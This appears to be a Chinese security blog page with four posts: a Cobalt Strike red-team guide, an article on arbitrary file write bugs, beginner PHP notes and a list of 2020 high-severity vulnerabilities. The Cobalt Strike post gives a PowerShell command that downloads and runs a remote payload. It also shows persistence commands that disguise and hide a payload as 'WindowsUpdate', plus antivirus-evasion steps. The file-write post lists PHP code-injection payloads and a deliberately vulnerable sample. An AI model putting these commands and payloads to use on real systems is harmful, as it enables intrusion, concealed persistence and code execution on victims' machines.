0e0w Blog!

• 一篇文章深入理解CobaltStrike

  2020-05-10

  0e0w

  渗透测试

  内网渗透  CobaltStrike
  • 01-基础用法
  • 02-免杀基础
  • 03-上线思考
  • 04-权限维持
  • 05-内网渗透
  • 06-流量转发
  • 07-拓展脚本
  • 08-逆向重构
  • 09-参考链接

  这是一篇关于Cobalt Strike的的文章。由于作者能力有限，文中定会出现一些错误，请谅解。本文创建时间为2020年5月10日，最近一次更新时间为2020年9月15日。本文会不定期更新。鉴于凡世之忙碌，下一次更新也许是明天，也许是下辈子。

  关于Cobalt Strike是什么？详见 cobaltstrike官网。

  01-基础用法

  • 基础操作

    • 安装环境
      • 服务端 apt-get install jdk
      • sudo apt-get install openjdk-9-jre openjdk-9-jdk
    • 修改服务端口
      • vi teamserver &&–> server_port=63908
    • 修改指纹
      • vi teamserver &&–> CN=aa, OU=bb, O=cc, L=dd, S=ee, C=ff
    • 监听器端口
      • http 6059
    • HTTPS上线

  • 运行：

    • 服务端：nohup ./teamserver ip passwd0e0w &
    • 客户端运行后通过IP密码连接。
    • 低调上线
      • 域名上线
      • 免费cdn

  • 监听器

    • beacon
    • 内置监听器
    • foreign
      • 派生监听器

  • 生成payload

    • Cobalt Strike ->Listeners ->Add ->Beacon HTTP ->……

  • Attacks ->Packages ->Payload Generator ->……

  • 上线：
    • 在靶机中执行生成的payload之后，不出意外即可上线。
    • 常见的执行payload方式？
    • 上线之后，可以设置sleep值方便快速回显。无操作时建议将sleep值调大一些。

  • beacon

    beacon是CS自带的命令，下面列举了这些常见的使用方法。

    • shell 可以执行cmd命令

  02-免杀基础

  生成一个免杀的payload在后渗透测试过程中尤为重要。由于免杀框架层出不穷现在的免杀也相比过去容易了很多。

  • Veil
    • CS Payload Generator中生成Veil的Payload.txt
    • Docker 运行Veil
    • docker pull mattiasohlsson/veil
      • docker run -it -v /root/Desktop/tools/veil:/var/lib/veil/output:Z mattiasohlsson/veil
      • use 1
      • use 17
      • generate
      • 3
      • 复制CS VeilPayload.txt
      • 参考 https://xz.aliyun.com/t/4191
  • shellcode
  • Powershell
  • 参考链接
    • https://www.t00ls.net/viewthread.php?tid=54993
    • https://www.t00ls.net/viewthread.php?tid=55754
    • https://www.t00ls.net/viewthread.php?tid=51321
    • https://github.com/darkr4y/geacon
    • https://www.t00ls.net/thread-55958-1-1.html
    • https://www.freebuf.com/articles/system/227463.html
    • https://wtfsec.org/posts/%E5%85%8D%E6%9D%80shellcode%E5%B9%B6%E7%BB%95%E8%BF%87%E6%9D%80%E6%AF%92%E6%B7%BB%E5%8A%A0%E8%87%AA%E5%90%AF%E5%8A%A8/
    • https://wtfsec.org/posts/%e5%85%8d%e6%9d%80-msf-windows-payload-%e7%9a%84%e6%96%b9%e6%b3%95%e4%b8%8e%e5%ae%9e%e8%b7%b5/
    • https://3gstudent.github.io/3gstudent.github.io/%E9%80%9A%E8%BF%87.NET%E5%AE%9E%E7%8E%B0%E5%86%85%E5%AD%98%E5%8A%A0%E8%BD%BDPE%E6%96%87%E4%BB%B6/

  03-上线思考

  如何上线？上线的分类有哪些？执行一条命令？运行一个可安装程序？

  • Linux上线
    • Linux如何上线？
    • http://blog.leanote.com/post/snowming/c34f9defe00c
  • 上线通知
    • https://www.t00ls.net/viewthread.php?tid=51487
  • 打开文件
    • 可执行文件
    • 文件捆绑
  • 执行命令
    • powershell
      • powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://ip:91/a’))”
      • http://ip:92/SiteLoader
      • http://ip/mPlayer
      • 参考：https://www.t00ls.net/viewthread.php?tid=52638
  • cmd
    • mshta
  • 注册表

  • dll劫持

  • https://kevien.github.io/2020/04/05/cobaltstrike-dns-beacon/

  • 上线提醒
    • 微信提醒：http_ftqq.cna
    • ./agscript ip 50050 teste passwd0e0w /root/cobaltstrike4.0-cracked/http_ftqq.cna
    • 邮箱提醒：

  04-权限维持

  获取到一个Session之后，可能会由于网络不稳定，机器重启等操作丢失Session。我们获取一个Session之后，首先要思考的就是如何使Session永久维持。除了思考永久停留的问题之外，还需要及时的将Session备份到其他的CS服务器上面。本文列举了一些Session永久维持的方法，抛砖引玉。

  • 永久停留

    本部分介绍了一些如何进行永久停留的方法，参考：https://xz.aliyun.com/t/5881

    • 计划任务
      • attrib C:\test.exe +s +h //隐藏文件
      • schtasks /create /tn WindowsUpdate /tr “C:\test.txt” /sc minute /mo 1
      • schtasks /delete /tn WindowsUpdate //删除计划任务
    • 注册表
      • reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d “C:\test.exe” /f
    • shift后门
    • Windows服务
      • sc create “WindowsUpdate” binpath= “cmd /c start C:\test.exe”;
      • sc config “WindowsUpdate” start= auto
      • net start WindowsUpdate
    • 自启目录
      • copy “C:\test.exe” “C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe” /y
      • attrib “C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe” +s +h

  • 备份Session

    获取shell之后可以将shell转发到其他的CS上，或者是转发到MSF上面，方便后续的测试。

  05-内网渗透

  内网渗透中，使用一些神洞进行。这些渗透往往是内网之中的大杀器。其中包括下面的这些神洞。除了这些神洞之外，在内网中总是会存在大量的弱口令，内网中弱口令扫描也尤为重要。同样，在内网中可能会存在大量服务器使用相同复杂密码的情况，因此密码嗅探也是比较有效的操作。

  除此之外，在内网中横向渗透时，优先考虑使用msf。

  • 主机神洞
    • MS17-010
  • 中间件神洞
    • Weblogic
  • 密码破解
    • ssh弱口令
    • rdp弱口令
    • 数据库弱口令
  • 密码抓取

  06-流量转发

  获取到一些服务器之后，为了测试的必要性可能需要把流量转发出来。当然，这可能是不必要的。进入内网横向渗透测试时

  • pivoting
    • https://blog.csdn.net/qq_26091745/article/details/104045090

  07-拓展脚本

  Cobalt Strike作为一款优秀的后渗透测试框架，可扩展性也极强。用户可以通过编写Cobalt Strike Script的方式新增功能。再此列举了一些比较优秀的Script。

  • https://github.com/harleyQu1nn/AggressorScripts
  • https://github.com/bluscreenofjeff/AggressorScripts
  • https://github.com/ramen0x3f/AggressorScripts
  • https://github.com/360-A-Team/CobaltStrike-Toolset
  • https://github.com/ars3n11/Aggressor-Scripts
  • https://github.com/michalkoczwara/aggressor_scripts_collection
  • https://github.com/vysec/Aggressor-VYSEC
  • https://github.com/killswitch-GUI/CobaltStrike-ToolKit
  • https://github.com/ZonkSec/persistence-aggressor-script
  • https://github.com/ramen0x3f/AggressorScripts
  • https://github.com/rasta-mouse/Aggressor-Script
  • https://github.com/RhinoSecurityLabs/Aggressor-Scripts
  • https://github.com/Und3rf10w/Aggressor-scripts
  • https://github.com/Kevin-Robertson/Inveigh
  • https://github.com/Genetic-Malware/Ebowla
  • https://github.com/001SPARTaN/aggressor_scripts
  • https://github.com/gaudard/scripts/tree/master/red-team/aggressor
  • https://github.com/branthale/CobaltStrikeCNA
  • https://github.com/oldb00t/AggressorScripts
  • https://github.com/p292/Phant0m_cobaltstrike
  • https://github.com/p292/DDEAutoCS
  • https://github.com/secgroundzero/CS-Aggressor-Scripts
  • https://github.com/skyleronken/Aggressor-Scripts
  • https://github.com/tevora-threat/aggressor-powerview
  • https://github.com/tevora-threat/PowerView3-Aggressor
  • https://github.com/threatexpress/aggressor-scripts
  • https://github.com/threatexpress/red-team-scripts
  • https://github.com/threatexpress/persistence-aggressor-script
  • https://github.com/FortyNorthSecurity/AggressorAssessor
  • https://github.com/mdsecactivebreach/CACTUSTORCH
  • https://github.com/C0axx/AggressorScripts
  • https://github.com/offsecginger/AggressorScripts
  • https://github.com/tomsteele/cs-magik
  • https://github.com/bitsadmin/nopowershell
  • https://github.com/SpiderLabs/SharpCompile
  • https://github.com/SpiderLabs/SharpCompile
  • https://github.com/realoriginal/reflectivepotato

  08-逆向重构

  某些需求下，需要逆向代码进行重构。可以对CS进行反编译，修改里面的功能之后进行重新打包成功jar文件。

  09-参考链接

  • https://github.com/TideSec/BypassAntiVirus

  • https://github.com/alphaSeclab/cobalt-strike

  • http://blog.leanote.com/post/snowming/de88219734d1

  • https://kevien.github.io/2020/04/05/cobaltstrike-dns-beacon/

  Read All

  ---

• 深入理解任意文件写入漏洞

  2020-04-10

  0e0w

  Web安全

  渗透测试
  • 01-基本概述
  • 02-代码审计
  • 03-渗透测试
  • 04-典型案例
  • 05-漏洞修复
  • 06-参考链接

  这是一篇关于任意文件写入漏洞的文章。由于作者能力有限，文中定会出现一些错误，请谅解。本文会不定期更新，最近一次更新时间为2020年9月15日。鉴于凡世之忙碌，下一次更新也许是明天，也许是下辈子。

  任意文件写入不同与文件上传漏洞，有些人也称之为是命令执行漏洞。漏洞出现的原因经常是在后台的一些配置文件修改编辑等处，程序开发过程中将这些配置信息未做好过滤保存到了文件中，用户可以在文件中写入任意的内容，导致漏洞产生。

  01-基本概述

  任意文件写入可以直接Getshell，危害很大。但在渗透测试中，往往出现在Cms中。不进行代码审计的情况下，较难直接获取权限，因为无法判断写入到了那个文件中，但也有例外的情况。关于任意文件写入漏洞，有三个前提条件：

  • 文件写入函数的参数用户可控；
  • 可控参数没有做好过滤；
  • 写入的文件类型为可执行文件。

  02-代码审计

  任意文件写入漏洞代码审计思路：寻找文件写入或文件保存等相关函数，查看函数中变量用户是否可控，是否进行了过滤处理，是否保存到了可执行文件中。一般采用代码审计工具可以很好的找出此类漏洞，对于误报情况较大的情况，只需要人工去逐个分析排查即可。

  一、PHP文件写入

  相关函数

  • fopen() 创建文件，打开文件或URL。

    $file = fopen("admin.php", "w")
    

  • fwrite() 写入文件

    fwrite($file, $str)
    

  • file_put_contents() 把字符串写入文件

    file_put_contents("admin.php","<?PHP phpinfo();?>");
    

  • fputcsv() 将行数据格式化为CSV格式并写入文件

  • fputs() 将字符串写入文件

  • socket_write() 写一个 Socket

  • session_write_close() 向Session中写入数据并终止Session

  • ftp_nb_get() 从FTP服务器上获取文件并写入本地文件

  • imagefttext() 使用FreeType2字体将文本写入图像

  • imagettftext() 用TrueType字体向图像写入文本

  二、Java文件写入

  相关函数

  • FileWriter()
  • BufferedWriter()

  三、基础绕过方法

  没有任何过滤直接将字符串写入文件的情况还是比较少的。有一部分漏洞是已经对参数做了过滤，但是没有完美过滤，导致使用某些技巧可言绕过。

  • 利用换行符来绕过正则匹配。

    <?php
    $api = addslashes($_GET['api']);
    $file = file_get_contents('./option.php');
    $file = preg_replace("/\\\$API = '.*';/", "\$API = '{$api}';", $file);
    file_put_contents('./option.php', $file);
    

    • update.php?api=aaaaa%27;%0aphpinfo();//
    • update.php?api=aaaaa

  • 利用 preg_replace函数的问题。

  • 利用 preg_replace() 第二个参数，自动转义反斜线。

  • 利用正则\n

    $n，将第n个子组替换到文本中

    $a = 'aa1234aa';
    $b = preg_replace('/aa(\d+)aa/', 'bb\1bb', $a);
    echo $b;
    

  • 多次提交进行逃逸。

  03-渗透测试

  在渗透测试中，可以在配置文件修改等地方插入类似的payload，查看当前页面的返回情况，或者是通过以往的经验来判断文件写入的位置。很多情况下，配置文件也并非是写入到了可执行文件中，而是写入到了数据库中。在渗透测试中，任意文件写入有俩种常见的情况：

  • 配置文件处任意字符串写入

  • 程序安装时install任意字符串写入

  常见payload

  <?php phpinfo();?>
  phpinfo();
  ";phpinfo();//
  ";@phpinfo();//
  ';phpinfo();//
  ‘;phpinfo();//
  ';@phpinfo();//
  \',@phpinfo(),//',
  \';phpinfo();//
  aaa';phpinfo();%0a//
  ';%0aphpinfo();//
  ;phpinfo();
  \%27;%0aphpinfo();%23
  \%27;%0aphpinfo();//
  \%27);%0aphpinfo();%23
  \%27);phpinfo();%23
  ';phpinfo();//
  ");phpinfo();//
  

  04-典型案例

  出现过任意文件写入漏洞的程序。

  • phpcms
  • SeaCms
  • Discuz
  • 74cms
  • dedecms
  • 致远OA v8任意文件写入

  05-漏洞修复

  • 尽量避免在可执行文件中保存字符串内容。
  • 对写入的字符串进行完美的过滤。

  06-参考链接

  • https://www.leavesongs.com/PENETRATION/thinking-about-config-file-arbitrary-write.html
  • http://suo.im/5VUqhn
  • https://blog.csdn.net/Ca3tie1/article/details/104830356
  Read All

  ---

• PHP基础笔记

  2020-01-01

  0e0w

  程序语言

  PHP

  本文是自己学习PHP时的一些基础笔记。

  1. PHP对大小写不敏感，变量的大小写敏感。

  2. 函数在执行完成之后，会删除所有变量。

  3. static静态变量执行完成之后不会删除。会存储最后一次被调用所包含的信息。

  4. PHP中，使用echo和print进行打印与输出。

  5. PHP中有7个数据类型：字符串、整数、浮点数、逻辑、数组、对象、NULL。
     • 字符串：引号内的任何文本都是字符串。
     • 整数：没有小数的数字。整数可以是十进制、八进制、十六进制。
     • 浮点数：有小数点的数字或者是指数形式的数字。
     • 逻辑：布尔值，true、false
     • 数组：数组在一个变量中存储多个值。$shuzu=array(“Volvo”,”BMW”,”SAAB”);
     • 对象：须声明对象的类，类是包含属性和方法的结构，使用class定义。在对象类中定义数据类型，该类的实例中使用此数据类型。
     • NULL：null，表示无值。

  6. var_dump()返回变量的数据类型和值。var_dump(10.365)

  7. PHP变量
     • 变量是存储信息的容器。以$符合开头。PHP没有创建变量的命令。变量会在首次为其赋值时创建。
     • PHP是一门类型松散的语言。对变量不需要定义数据类型。Python的多态。
     • PHP有三个变量作用域：1）loca（局部）2）global（全局）3）static（静态）
     • 普通变量定义在：1）全局变量不能在函数内部调用 2）局部变量不能在函数外部调用。
     • 函数内部调用全局变量，在函数内部变量前加 global。

  8. PHP常量

  9. • 常量自动是全局的。
     • 使用define()函数进行定义常量。
     • 一些默认的常量：
  10. PHP运算符
      • 算数运算符：加减乘除取余
      • • <?php
        • $x=17;
        • $y=8;
        • echo ($x + $y); // 输出 25
        • echo ($x - $y); // 输出 9
        • echo ($x * $y); // 输出 136
        • echo ($x / $y); // 输出 2.125
        • echo ($x % $y); // 输出 1
        • ?>
      • 赋值运算符：
        • 赋值 等同于
        • x = y x = y
        • x += y x = x + y
        • x -= y x = x - y
        • x *= y x = x * y
        • x /= y x = x / y
        • x %= y x = x % y
      • 字符串运算符
        • . 串接，字符串连接
        • .= 串接赋值
      • 递增/递减运算符
        • ++$x 前递增 $x 加一递增，然后返回 $x
        • $x++ 后递增 返回 $x，然后 $x 加一递增
        • –$x 前递减 $x 减一递减，然后返回 $x
        • $x– 后递减 返回 $x，然后 $x 减一递减
      • 比较运算符，返回布尔值
        • == 等于 $x == $y 如果 $x 等于 $y，则返回 true。
        • === 全等（完全相同） $x === $y 如果 $x 等于 $y，且它们类型相同，则返回 true。
        • != 不等于 $x != $y 如果 $x 不等于 $y，则返回 true。
        • <> 不等于 $x <> $y 如果 $x 不等于 $y，则返回 true。
        • !== 不全等（完全不同） $x !== $y 如果 $x 不等于 $y，或它们类型不相同，则返回 true。
        • > 大于 $x > $y 如果 $x 大于 $y，则返回 true。
        • < 小于 $x < $y 如果 $x 小于 $y，则返回 true。
        • >= 大于或等于 $x >= $y 如果 $x 大于或者等于 $y，则返回 true.
        • <= 小于或等于 $x <= $y 如果 $x 小于或者等于 $y，则返回 true。
      • 逻辑运算符，返回布尔值
        • and 与 $x and $y 如果 $x 和 $y 都为 true，则返回 true。
        • or 或 $x or $y 如果 $x 和 $y 至少有一个为 true，则返回 true。
        • xor 异或 $x xor $y 如果 $x 和 $y 有且仅有一个为 true，则返回 true。
        • && 与 $x && $y 如果 $x 和 $y 都为 true，则返回 true。

        • 或 $x

          $y 如果 $x 和 $y 至少有一个为 true，则返回 true。

        • ! 非 !$x 如果 $x 不为 true，则返回 true。
      • 数组运算符
        • + 联合 $x + $y $x 和 $y 的联合（但不覆盖重复的键）
        • == 相等 $x == $y 如果 $x 和 $y 拥有相同的键/值对，则返回 true。
        • === 全等 $x === $y 如果 $x 和 $y 拥有相同的键/值对，且顺序相同类型相同，则返回 true。
        • != 不相等 $x != $y 如果 $x 不等于 $y，则返回 true。
        • <> 不相等 $x <> $y 如果 $x 不等于 $y，则返回 true。
        • !== 不全等 $x !== $y 如果 $x 与 $y 完全不同，则返回 true。
  11. 条件语句
      • if 语句 - 如果指定条件为真，则执行代码
      • if…else 语句 - 如果条件为 true，则执行代码；如果条件为 false，则执行另一端代码
      • if…elseif….else 语句 - 根据两个以上的条件执行不同的代码块
      • switch 语句 - 选择多个代码块之一来执行
  12. 循环语句
      • while - 只要指定条件为真，则循环代码块
      • do…while - 先执行一次代码块，然后只要指定条件为真则重复循环
      • for - 循环代码块指定次数
      • foreach - 遍历数组中的每个元素并循环代码块
  13. PHP函数
      • PHP 的真正力量来自它的函数：它拥有超过 1000 个内建的函数。
      • 自定义函数：
        • 函数声明：function hanshu($year,$mon=12){echo “hw”;return $z;}
        • 函数名对大小写不敏感。
        • 调用函数：hanshu();
      • 可以通过参数向函数传递信息。参数类似变量。
  14. PHP数组
      • 数组是一种数/值对的简单列表。
      • 索引数组，等于Python中的列表、元组
        • $cars=array(“porsche”,”BMW”,”Volvo”);
      • 关联数组，字典
        • $age=array(“Bill”=>”35”,”Steve”=>”37”,”Elon”=>”43”);
      • 多维数组，数组中的数组
      • 数组排序
        • sort() - 以升序对数组排序
        • rsort() - 以降序对数组排序
        • asort() - 根据值，以升序对关联数组进行排序
        • ksort() - 根据键，以升序对关联数组进行排序
        • arsort() - 根据值，以降序对关联数组进行排序
        • krsort() - 根据键，以降序对关联数组进行排序
  15. 超全局变量
      • PHP 中的许多预定义变量都是“超全局的”，一个脚本的全部作用域中都可用。
      • 在函数或方法中无需执行 global $variable; 就可以访问它们。
      • $_GET
      • $_POST
      • $_REQUEST
      • $_COOKIE
      • $_SESSION
      • $_SERVER
      • $GLOBALS
      • $_FILES
      • $_ENV

  16. PHP表单

      • PHP 表单验证
  17. PHP符号
      • -> 对象成员访问符号。对象执行方法或取得属性
      • => 数组成员访问符号。数组中用于数组的 key 和 value之间的关系
      • ?: 三目运算符
      • :
      • :: 类中静态方法和静态属性的引用方法
      • . 连接字符串
      • @ 错误运算符
      • parent:: 调用父类的构造函数
      • []数组
      • $ 变量
      • $$ 可变变量
      • $row[title]：row为数组。title为$row数组里的一个下标。$row多数用在数据库读取，所以这里可能是显示数据库中的title字段。
  18. PHP关键字
      • public ：表示全局，类内部外部子类都可以访问，是公共属性。
      • private：表示私有的，只有本类内部可以使用；
      • protected：表示受保护的，只有本类或子类或父类中可以访问；
      • extends :继承
      • final：PHP 5 新增。父类中的方法被声明为 final，则子类无法覆盖该方法。一个类被声明为 final，则不能被继承。
      • return ：是语言结构不是函数，仅在参数包含表达式时才需要用括号将其括起来。当返回一个变量时通常不用括号，这样可以降低PHP的负担。
      • cache ：PHP缓存
      • $this-> ：伪变量。没有固定的值。是对象的引用。是OOP编程思路。
      • new ：实例化一个对象。
      • namespace：命名空间

  19. PHP解析

  20. PHP参考

      • https://www.cnblogs.com/phpper/p/8976304.html
  Read All

  ---

• 2020年高危漏洞

  2020-01-01

  0e0w

  渗透测试

  2020漏洞  0day
  • 2020年高危漏洞统计列表

  这是一篇统计2020年高危漏洞列表的文章。由于作者能力有限，文中定会出现一些错误，请谅解。本文创建时间为2020年1月1日，最近一次更新时间为2020年12月31日。本文会不定期更新。打钩的漏洞说明已经拥有完整的利用程序，或尽可能的对其进行了漏洞分析。相关分析文章可能不会在第一时间公开。鉴于凡世之忙碌，下一次更新也许是明天，也许是下辈子。

  格式：出现时间#CVE编号-漏洞名称

  2020年高危漏洞统计列表

  • 1230#深信服SSL VPN存在命令注入漏洞
  • 1229#74CMS weixin connect 远程代码执行漏洞
  • 1208#s2-061-Apache Struts远程代码执行漏洞
  • 1127#CVE-2020-28948-Drupal 远程代码执行漏洞
  • 1120#CVE-2020-13942-Apache Unomi远程代码执行漏洞
  • 1117#CVE-2020-8209-Citrix XenMobile Server路径遍历
  • 1114#CVE-2020-26935-phpMyAdmin SQL注入漏洞
  • 1109#CNVD-2020-58823-ECShop4.1.0前台免登录SQL注入漏洞
  • 1021#CVE-2020-3992-VMware ESXi 远程代码执行漏洞
  • 1018#CVE-2020-16898-Windows TCP/IP远程执行代码漏洞
  • 1015#CVE-2020-15227-Nette框架未授权远程代码执行漏洞
  • 1014#暂无CVE-VMware任意文件读取漏洞
  • 1013#CVE-2020-13957-Apache Solr ConfigSet 文件上传漏洞
  • 1012#CVE-2020-26945-MyBatis 远程代码执行漏洞
  • 1009#CVE-2020-11800-Zabbix远程执行代码漏洞
  • 1009#CVE-2020-15012-Nexus Repository Manager 2目录遍历漏洞
  • 1009#CNVD-2019-20835-齐治堡垒机前台远程命令执行漏洞
  • 0922#CVE-2020-11991-Apache Cocoon XML外部实体注入漏洞
  • 0922#CVE-2020-4643-WebSphere XML外部实体注入漏洞
  • 0918#CVE-2020-0618-SQLServer报表服务远程代码执行漏洞
  • 0918#CVE-2020-7115-Aruba Clearpass远程代码执行漏洞
  • 0917#CVE-2020-15148-Yii 2框架反序列化远程命令执漏洞
  • 0917#CVE-2020-13948-Apache Superset 远程代码执行
  • 0915#深信服 SSL VPN Nday - Pre Auth 修改绑定手机
  • 0915#深信服 SSL VPN Nday - Pre Auth 任意密码重置
  • 0915#CVE-2020-1472-NetLogon特权提升漏洞
  • 0914#CVE-2020-2040-PAN-OS远程代码执行漏洞
  • 0914#ThinkPHP3.x存在SQL注入漏洞
  • 0914#用友GRP-u8 SQL注入漏洞
  • 0912#泛微云桥任意文件读取漏洞
  • 0911#联软准入文件上传漏洞
  • 0911#奇治堡垒机 Python代码注入
  • 0911#用友GRP-u8 命令执行漏洞
  • 0911#天融信负载均衡SQL注入漏洞
  • 0911#绿盟UTS综合威胁探针管理员任意登录
  • 0911#深信服EDR3.2.21远程代码执行
  • 0911#CVE-2020-11974-Apache DolphinScheduler远程执行代码漏洞
  • 0911#CVE-2020-11107-XAMPP任意命令执行漏洞
  • 0909#CVE-2020-16875-Exchange远程代码执行漏洞
  • 0904#深信服EDR远程代码 执行漏洞
  • 0903#CVE-2020-24616-Jackson 多个反序列化安全漏洞
  • 0823#宝塔面板888端口pma未授权访问
  • 0819#深信服 EDR 任意用户登录漏洞
  • 0819#泛微e-cology某版本存在RCE漏洞
  • 0818#CVE-2020-13933-Apache Shiro 权限绕过漏洞
  • 0818#通达OA11.6未授权远程代码执行漏洞
  • 0817#深信服EDR远程命令执行漏洞
  • 0817#天融信数据防泄漏系统未授权修改管理员密码
  • 0817#CVE-2020-11995-Apache Dubbo远程代码执行漏洞
  • 0817#PHPCMS v9全版本前台RCE
  • 0813#CVE-2019-0230-Struts2远程代码执行漏洞
  • 0808#CVE-2020-13699-TeamViewer全版本无密码连接
  • 0805#CVE-2020-13921-Apache SkyWalking SQL注入漏洞
  • 0716#CVE-2020-13925-Apache Kylin 远程命令执行漏洞
  • 0715#CVE-2020-1350-Windows DNS Server远程代码执行漏洞
  • 0715#CVE-2020-14645-Weblogic命令执行漏洞
  • 0711#CVE-2020-8194-Citrix代码注入等系列漏洞
  • 0708#CVE-2020-10977-Gitlab CE/EE任意文件读取/RCE
  • 0707#CVE-2020-8193-Citrix ADC远程代码执行
  • 0703#CVE-2020-5902-F5 BIG-IP TMUI 远程代码执行漏洞
  • 0702#CVE-2020-9498-Apache Guacamole RDP 远程代码执行漏洞
  • 0624#CVE-2020-9480-Apache Spark远程代码执行漏洞
  • 0623#CVE-2020-11989-Apache Shiro身份验证绕过漏洞
  • 0623#CVE-2020-1948-Apache Dubbo反序列化漏洞
  • 0620#CVE-2020-9483-Apache SkyWalkingSQL注入漏洞
  • 0605#CVE-2020-4450-WebSphere远程代码执行漏洞
  • 0604#用友NC6.5反序列化漏洞
  • 0603#CVE-2020-3956-VMware Cloud Director 代码注入漏洞
  • 0602#CVE-2020-5410-Spting-Cloud-Config-Server目录遍历
  • 0530#CVE-2020-1956-Apache Kylin远程命令执行漏洞
  • 0528#Fastjson <= 1.2.68 远程命令执行漏洞
  • 0521#CVE-2020-9484-Apache Tomcat session持久化远程代码执行漏洞
  • 0507#vBulletin 5.6.1 SQL注入漏洞
  • 0503#CVE-2020-11651-SaltStack认证绕过漏洞/命令执行
  • 0503#CVE-2020-11652-SaltStack目录遍历漏洞
  • 0417#通达OA11.4存在越权登录漏洞
  • 0413#CVE-2020-4362-WebSphere远程代码执行漏洞
  • 0401#通达OA11.5存在多处SQL注入漏洞
  • 0327#CVE-2020-1947-ShardingShpere命令执行漏洞
  • 0323#通达OA文件包含漏洞和SQL注入漏洞
  • 0323#CVE-2020-0796 SMBV3远程命令执行漏洞
  • 0326#CVE-2020-0688-Exchange远程代码执行漏洞
  • 0220#CVE-2020-1938-Apache Tomcat文件包含漏洞
  • 0211#CVE-2019-17564-Apache Dubbo反序列化漏洞
  • 0115#CVE-2020-0601-签名伪造
  • 0110#ThinkPHP6 任意文件操作漏洞
  • 0104#CVE-2020-2551-Weblogic反序列化漏洞
  • 0104#CVE-2020-2555-Weblogic反序列化漏洞
  • 0102#CVE-2019-17588-Apache Solr模板注入远程代码执行漏洞
  • 0101#CVE-2019-20197-Nagios XI远程命令执行漏洞
  Read All

  ---